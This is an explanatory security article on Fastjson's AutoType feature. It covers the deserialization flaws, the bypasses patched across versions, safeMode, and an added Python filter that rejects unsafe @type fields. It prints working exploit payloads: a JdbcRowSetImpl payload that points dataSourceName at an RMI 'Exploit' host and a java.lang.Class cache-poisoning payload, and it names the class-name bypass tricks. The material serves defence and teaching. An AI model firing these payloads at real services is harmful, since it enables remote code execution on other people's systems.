Information Security 17 min read

Understanding Fastjson AutoType and Its Security Implications

This article examines Fastjson's AutoType feature, explains how it works, demonstrates how it can lead to serious deserialization vulnerabilities, reviews the evolution of related security patches across versions, and provides guidance on safe usage and mitigation strategies.

Full-Stack Internet Architecture

Fastjson is a widely used JSON parsing library from Alibaba that converts between Java objects and JSON strings. Over the years, multiple security vulnerabilities have been discovered, many of which are tied to the AutoType feature introduced to preserve type information during serialization.

What is AutoType? AutoType records the original Java class of an object in the JSON payload (using the @type field) so that during deserialization the exact class can be reconstructed. This is useful when a field is declared as an interface or abstract class, as Fastjson would otherwise lose the concrete type.

Example code shows a Store class containing a Fruit interface. Without AutoType, deserialization yields a proxy object that cannot be cast back to the concrete Apple class, causing a ClassCastException. Enabling AutoType via SerializerFeature.WriteClassName adds the @type attribute, allowing successful reconstruction of the original Apple instance.

Security Risks The @type mechanism can be abused by attackers to instantiate arbitrary classes. By crafting a JSON payload with "@type":"com.sun.rowset.JdbcRowSetImpl" and a malicious dataSourceName, remote code execution can be achieved because Fastjson will invoke the setter of the target class during deserialization.

Fastjson initially had AutoType enabled by default (pre‑v1.2.25), which made it vulnerable. Starting with v1.2.25, AutoType was disabled by default and a whitelist/blacklist check (checkAutoType) was introduced. However, attackers found ways to bypass these checks by manipulating class name strings (e.g., adding a leading L and trailing ;), using double prefixes (LL) or array notation ([), and exploiting the global class cache.

The article chronicles the arms race between Fastjson maintainers and attackers across versions v1.2.41, v1.2.42, v1.2.43, v1.2.44, v1.2.47, v1.2.48, and up to v1.2.72, describing specific bypass techniques and corresponding patches such as stricter prefix checks, cache disabling for java.lang.Class, and the introduction of safeMode in v1.2.68.

SafeMode can be enabled globally via ParserConfig.getGlobalInstance().setSafeMode(true). When safeMode is on, any @type field is rejected with an exception instead of being resolved to a class, effectively disabling AutoType and preventing the described attacks.
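The Security Risks paragraph lists the string tricks used to slip class names past checkAutoType, and the paragraph above describes the two postures a deployment can take (safeMode, or an accept list of trusted packages). The following added example, which is not Fastjson's code and not from the article, shows what a defender-side pre-parse filter looks like: it walks a JSON document before it reaches the deserializer, collects every @type value, strips the L/LL/;/[ decorations named above so that obfuscated and plain spellings compare equal, and then either rejects any @type (safeMode) or requires the normalized class to sit under an assumed application package prefix. The package prefix com.hollis.lab.fastjson.test. is taken from the article's serialized output; the sample payloads are constructed from the ones the article shows.

```python
"""Pre-parse check for Fastjson-style @type fields (added example, not Fastjson code)."""
import json
from typing import Iterator

# Assumed application-owned package prefix (the same kind of prefix that
# Fastjson's ParserConfig.addAccept() takes). Constructed for this example.
ACCEPT_PREFIXES = ("com.hollis.lab.fastjson.test.",)

# Constructed sample payloads, modelled on the ones shown in the article.
SAMPLE_STORE = ('{"@type":"com.hollis.lab.fastjson.test.Store","fruit":'
                '{"@type":"com.hollis.lab.fastjson.test.Apple","price":0.5},"name":"Hollis"}')
SAMPLE_JDBC = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
               '"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}')
SAMPLE_CLASS_CACHE = '{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}'


def normalize_class_name(name: str) -> str:
    """Undo the decorations the article lists as checkAutoType bypasses.

    'Lfoo.Bar;', 'LLfoo.Bar;;' and '[foo.Bar' all normalise to 'foo.Bar', so
    a single accept-list comparison covers the plain and obfuscated spellings.
    """
    name = name.strip()
    # JVM array descriptor prefix; repeated for multi-dimensional arrays.
    while name.startswith("["):
        name = name[1:]
    # JVM object descriptor form L<class>; which the bypasses also doubled (LL...;;).
    while name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def iter_type_names(node) -> Iterator[str]:
    """Yield every @type value anywhere in a parsed JSON tree (nested objects and arrays)."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                yield value
            else:
                yield from iter_type_names(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_type_names(item)


def check_payload(raw: str, safe_mode: bool = False) -> tuple[bool, str]:
    """Decide whether a JSON document may be handed to an AutoType-capable parser.

    Returns (allowed, reason). safe_mode=True mirrors Fastjson's safeMode: any
    @type at all is rejected. Otherwise every @type must normalise to a class
    under ACCEPT_PREFIXES.
    """
    try:
        doc = json.loads(raw)
    except ValueError as exc:
        return False, f"not valid JSON: {exc}"
    types = list(iter_type_names(doc))
    if not types:
        return True, "no @type fields"
    if safe_mode:
        return False, f"safeMode: @type present ({types[0]!r})"
    for raw_name in types:
        name = normalize_class_name(raw_name)
        if not name.startswith(ACCEPT_PREFIXES):
            return False, f"class not on accept list: {raw_name!r} -> {name!r}"
    return True, "all @type values on accept list"


if __name__ == "__main__":
    for label, payload in (("store", SAMPLE_STORE), ("jdbc", SAMPLE_JDBC),
                           ("class-cache", SAMPLE_CLASS_CACHE),
                           ("double-prefix", '{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;"}')):
        print(f"{label:13s} accept-list: {check_payload(payload)}")
        print(f"{label:13s} safeMode:    {check_payload(payload, safe_mode=True)}")
```

The filter is a defence-in-depth layer in front of the parser, not a replacement for it: the normalization has to mirror whatever spellings the installed Fastjson version actually resolves, which is exactly the moving target the version history above describes, so the authoritative control remains the parser's own safeMode or accept list on an up-to-date release. The java.lang.Class payload is rejected here simply because java.lang.Class is not under the application prefix, which is the same reason an accept-list posture blocks the cache-poisoning route.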

The article concludes by recommending developers upgrade to the latest Fastjson version, enable safeMode if AutoType is not needed, and remain aware of the trade‑off between performance and security inherent in fast serialization libraries.

Example classes (Store holds its Fruit through the interface type, so the serialized JSON carries no record of the concrete class unless AutoType writes one):

import java.math.BigDecimal;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.serializer.SerializerFeature;

class Store {
    private String name;
    private Fruit fruit;
    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
    public Fruit getFruit() { return fruit; }
    public void setFruit(Fruit fruit) { this.fruit = fruit; }
}

interface Fruit {}

class Apple implements Fruit {
    private BigDecimal price;
    public BigDecimal getPrice() { return price; }
    public void setPrice(BigDecimal price) { this.price = price; }
}

Serializing without AutoType (the concrete type of fruit is lost):

Store store = new Store();
store.setName("Hollis");
Apple apple = new Apple();
apple.setPrice(new BigDecimal(0.5));
store.setFruit(apple);
String jsonString = JSON.toJSONString(store);
System.out.println("toJSONString : " + jsonString);

Output:
{"fruit":{"price":0.5},"name":"Hollis"}

Serializing with AutoType (WriteClassName adds an @type field to each object):

String jsonString = JSON.toJSONString(store, SerializerFeature.WriteClassName);
System.out.println("toJSONString : " + jsonString);

Output:
{"@type":"com.hollis.lab.fastjson.test.Store","fruit":{"@type":"com.hollis.lab.fastjson.test.Apple","price":0.5},"name":"Hollis"}

The JdbcRowSetImpl payload described under Security Risks (the dataSourceName setter triggers the lookup):
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

The java.lang.Class payload that abused the global class cache before the cache was disabled for that type:
{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}

Enabling safeMode globally (v1.2.68 and later):
ParserConfig.getGlobalInstance().setSafeMode(true);
Tags: Java, security, fastjson, deserialization, vulnerability, safeMode, AutoType
Written by Full-Stack Internet Architecture: introducing full-stack Internet architecture technologies centered on Java